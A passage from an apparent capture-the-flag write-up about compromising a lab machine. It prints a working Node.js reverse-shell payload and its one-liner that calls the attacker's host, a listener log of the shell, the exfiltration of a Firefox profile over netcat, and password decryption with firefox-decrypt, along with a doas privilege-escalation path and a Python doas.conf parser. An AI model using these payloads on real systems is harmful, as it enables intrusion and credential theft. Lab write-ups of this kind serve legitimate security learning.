But it will be easier to spawn a reverse shell directly.
```javascript
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    client.connect(9999, "10.9.19.77", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
```
Let's one-line it.
```javascript
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/bash", []); var client = new net.Socket(); client.connect(9999, "10.9.19.77", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return/a/; })();
```
```
$ ncat -nlvp 9999
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.227.181.
Ncat: Connection from 10.10.227.181:40986.
id
uid=1000(user) gid=1000(user) groups=1000(user),30(dip),46(plugdev)
pwd
/var/web
ls -lhA /home/user
total 40K
lrwxrwxrwx   1 root root    9 Jan 21  2021 .bash_history -> /dev/null
-rw-r--r--   1 user user 3.7K Apr  4  2018 .bashrc
drwx------   2 user user 4.0K Jan  4  2021 .cache
drwxrwxrwx   4 user user 4.0K Jan 27  2021 .firefox
drwx------   3 user user 4.0K Jan  4  2021 .gnupg
drwxr-xr-x 270 user user  12K Jan  4  2021 .npm
drwxrwxr-x   5 user user 4.0K Jan 22 18:43 .pm2
drwx------   2 user user 4.0K Jan 21  2021 .ssh
-rw-rw-r--   1 user user   22 Jan  4  2021 user.txt
```
`sudo -l` requires a password and we don't have it. As the hint suggests that sudo is too heavy, maybe this machine is using an alternative.

Here the EoP scenario exploits doas, which is a lightweight alternative to sudo.
```
which doas
/usr/local/bin/doas
cat /usr/local/etc/doas.conf
permit v0id as root
```
Only v0id can run commands as root with doas, so let's EoP to v0id first.
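To make the doas semantics concrete, here is a small Python parser for doas.conf rules, added for this write-up (it is not code from the box or from the doas project), that mirrors the last-matching-rule evaluation described in doas.conf(5) and lists which identities get unrestricted root. Only the first rule of the sample config is the one found on the box; the other three are constructed.

```python
import re
from collections import namedtuple
# target None: any target user; cmd None: any command; identity ":name" is a group
Rule = namedtuple("Rule", "action identity target cmd options")

def parse_doas_conf(text):
    """Parse lines of the form: permit|deny [options] identity [as target] [cmd command [args ...]]"""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line: continue
        # collapse a 'setenv { ... }' block to the bare keyword; its variables are not audited here
        toks = re.sub(r"setenv\s*\{[^}]*\}", "setenv", line).split()
        action, toks = toks[0], toks[1:]
        if action not in ("permit", "deny"):
            raise ValueError("not a doas rule: " + raw)
        options = set()
        while toks and toks[0] in ("nopass", "nolog", "persist", "keepenv", "setenv"):
            options.add(toks.pop(0))
        identity, target, cmd = toks.pop(0), None, None
        if toks[:1] == ["as"]:
            target, toks = toks[1], toks[2:]
        if toks[:1] == ["cmd"]:
            cmd = toks[1]            # any trailing 'args ...' are ignored in this audit
        rules.append(Rule(action, identity, target, cmd, options))
    return rules

def decide(rules, user, groups, target, cmd):
    """Like doas: the last matching rule decides; None means no rule matched (request denied)."""
    last = None
    for r in rules:
        ident_ok = r.identity == user or (r.identity.startswith(":") and r.identity[1:] in groups)
        if ident_ok and r.target in (None, target) and r.cmd in (None, cmd):
            last = r
    return last

def unrestricted_root(rules):
    """Identities with a permit rule for root that carries no cmd restriction (the finding on this box)."""
    return [r.identity for r in rules
            if r.action == "permit" and r.target in (None, "root") and r.cmd is None]

# constructed sample config: rule 1 is the one found in /usr/local/etc/doas.conf on the box,
# the other three are made up to exercise group identities, cmd restrictions and deny rules
SAMPLE_CONF = """\
permit v0id as root
permit nopass :wheel as root cmd /usr/bin/reboot
permit persist alice as root
deny alice as root cmd /bin/sh
"""
RULES = parse_doas_conf(SAMPLE_CONF)
```

Running `unrestricted_root(RULES)` on the real file would return only `v0id`, which is exactly why the next step pivots to that user.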
We saw in the previous step there was a ~/.firefox directory for our current
user.
```
ls -lhA /home/user/.firefox
total 12K
drwxrwxrwx 11 user user 4.0K Jan 27  2021 b5w4643p.default-release
drwxrwxrwx  3 user user 4.0K Jan 27  2021 'Crash Reports'
-rwxrwxr-x  1 user user  259 Jan 27  2021 profiles.ini
```
Netcat is available so we can use it to download the directory:
```
which nc
/bin/nc
```
On our machine:
```
$ mkdir ff-profile && cd ff-profile
$ ncat -nlvp 7777 | tar xf -
```
```
Execution time: 2022-01-26 22:47:49.922231
Mozilla Profile: ff-profile/b5w4643p.default-release

====================================================================================================
Cookies [SHA256 hash: 20d942903d690f54af3e8aff1e2ca45084d49dbc8940b184e89eacd88c9d8525]
====================================================================================================

Traceback (most recent call last):
  File "/usr/bin/dumpzilla", line 1145, in <module>
    All_execute(varDir)
  File "/usr/bin/dumpzilla", line 204, in All_execute
    show_cookies_firefox(varDir,varDom = 0)
  File "/usr/bin/dumpzilla", line 238, in show_cookies_firefox
    cursor.execute("select baseDomain, name, value, host, path, datetime(expiry, 'unixepoch', 'localtime'), datetime(lastAccessed/1000000,'unixepoch','localtime') as last ,datetime(creationTime/1000000,'unixepoch','localtime') as creat, isSecure, isHttpOnly FROM moz_cookies where baseDomain like ? escape '\\' and name like ? escape '\\' and host like ? escape '\\' and last like ? and creat like ? and isSecure like ? and isHttpOnly like ? and last between ? and ? and creat between ? and ?",[varDomain,varName,varHost,('%'+varLastacess+'%'),('%'+varCreate+'%'),varSecure,varHttp, varRangeLast1, varRangeLast2, varRangeCreate1,varRangeCreate2])
sqlite3.OperationalError: no such column: baseDomain
```
But dumpzilla crashes: its last release is from 2013 and it doesn't seem to support newer Firefox profile versions. As we are only interested in passwords, let's use firefox-decrypt instead.
```
$ firefox-decrypt ff-profile/
Select the Mozilla profile you wish to decrypt
1 -> hknqkrn7.default
2 -> b5w4643p.default-release
2
```